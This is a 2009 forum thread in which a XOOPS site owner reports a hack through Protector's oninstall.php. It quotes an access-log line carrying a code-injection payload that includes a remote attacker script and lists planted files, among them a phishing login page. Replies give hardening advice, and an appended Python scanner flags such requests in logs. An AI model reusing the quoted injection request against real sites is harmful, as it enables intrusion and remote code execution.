1
CeroKool
HELP! oninstall.php malicious hack
  • 2009/1/28 22:19

  • CeroKool

  • Just popping in

  • Posts: 30

  • Since: 2007/7/17


My webspace was hacked. So, 1and1 sent me this e-mail...

Quote:
67.76.163.60 - - [13/Jan/2009:10:13:24 -0500] "GET
//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($
_GET[a]);function%20v
&a=http://forum.jj-nds-br.de/pbota.txt?&modez=botz HTTP/1.1" 200 5
http://www.cerokool.com "-" "Mozilla/5.0" "-"

--

The above was taken from your access logs. It shows that
//xoops_lib/modules/protector/oninstall.php
was used to perpetrate the hack.

Please contact the developers for this script/application. You will
likely need to install a version update and/or security patch to prevent
further abuse.

Also, reply to this email in acknowledgement of this issue. Failure to
do so can result in your account being locked and possibly terminated.

I disabled the following scripts:


./CK/images/banners/xoops_banner.php
./CK/images/banners/test/natwest/nwolb.com/Login.html
./CK/modules/protector/oninstall.php
./CK/modules/AMS/class/class.php
./CK/themes/default/icons/infos.php
./CK/themes/default/styleMAC.php
./CK/xoops_data/configs/dataconfigs.php
./CK/xoops_lib/modules/protector/oninstall.php
./CK/xoops_lib/modules/protector/security.php


I'm a noob... Help!

2
CeroKool
Update
  • 2009/1/28 22:56

  • CeroKool

  • Just popping in

  • Posts: 30

  • Since: 2007/7/17


If I posted this in the wrong place, sorry.

This might help.
XOOPS Version: XOOPS 2.3.2
PHP Version: 4.4.9
MySQL Version: 5.0.67-log
Server API Version: cgi
OS Version: Linux

Also, I deleted the folder:
./CK/xoops_lib/modules/protector/

3
McDonald
Re: Update
  • 2009/1/28 23:21

  • McDonald

  • Home away from home

  • Posts: 1072

  • Since: 2005/8/15


What version of Protector did you use?

Was Protector installed outside the document root?

Did you have the .htaccess file uploaded?
See here

4
CeroKool
Tnx 4 da help
  • 2009/1/29 1:14

  • CeroKool

  • Just popping in

  • Posts: 30

  • Since: 2007/7/17


I tried searching. Thanks for directing me.

By the way, are you the same McDonald as in MyTube (XoopsTube)? If so, I haven't been able to access your forum with the same user name (cerokool). I never got the e-mail and haven't found the option to send it again.

5
McDonald
Re: Tnx 4 da help
  • 2009/1/29 8:33

  • McDonald

  • Home away from home

  • Posts: 1072

  • Since: 2005/8/15


Yes, I'm the same McDonald.
Don't bother about that forum, it will close soon because of bankruptcy of the hoster.

6
iunderwood
Re: HELP! oninstall.php malicious hack

That protector vuln was posted on 1/9: https://xoops.org/modules/news/article.php?storyid=4601

I'm not sure how 1&1 works, but with my webhost, they put my web spaces under a public_html/site directory by default. What I did was then create an unpublic_html directory following a similar structure and put the xoops_data and xoops_lib directories under there.
++I;
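For anyone reviewing access logs after an incident like the one in this thread, here is an added example (not written by any poster here, and not XOOPS or Protector code). It flags requests that reach xoops_lib or xoops_data through the web server, and requests that pass a remote URL as a parameter value. It assumes combined-format access logs; the sample lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Directories the thread says belong outside the document root.
PRIVATE_DIRS = {"xoops_lib", "xoops_data"}
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3})')
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# Constructed sample lines (documentation addresses, not copied from the thread).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Jan/2009:10:13:24 -0500] "GET //xoops_lib/modules/protector/'
    'oninstall.php?mydirname=x&a=http://example.invalid/p.txt? HTTP/1.1" 200 5 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [13/Jan/2009:10:14:02 -0500] "GET /modules/news/article.php?storyid=4601 '
    'HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [13/Jan/2009:10:15:40 -0500] "GET /xoops_data/configs/ HTTP/1.1" '
    '403 199 "-" "Mozilla/5.0"',
]

def inspect(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, when, _method, target, status = m.groups()
    # Split by hand: urlsplit() would read a leading "//xoops_lib" as a hostname.
    path, _, query = target.partition("?")
    segments = [s.lower() for s in unquote(path).split("/") if s]
    reasons = []
    if PRIVATE_DIRS.intersection(segments):
        reasons.append("private-dir")
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_RE.match(value.strip()):
            reasons.append("remote-url-param:" + name)
    if not reasons:
        return None
    # A 2xx status means the server answered the request instead of refusing it.
    return {"ip": ip, "time": when, "path": "/" + "/".join(segments),
            "reasons": reasons, "served": status.startswith("2")}

def scan(lines):
    """Inspect every line and keep only the findings."""
    return [f for f in map(inspect, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `served` set to true on a private directory means those directories are still reachable from the web, which is the condition the relocation described above removes.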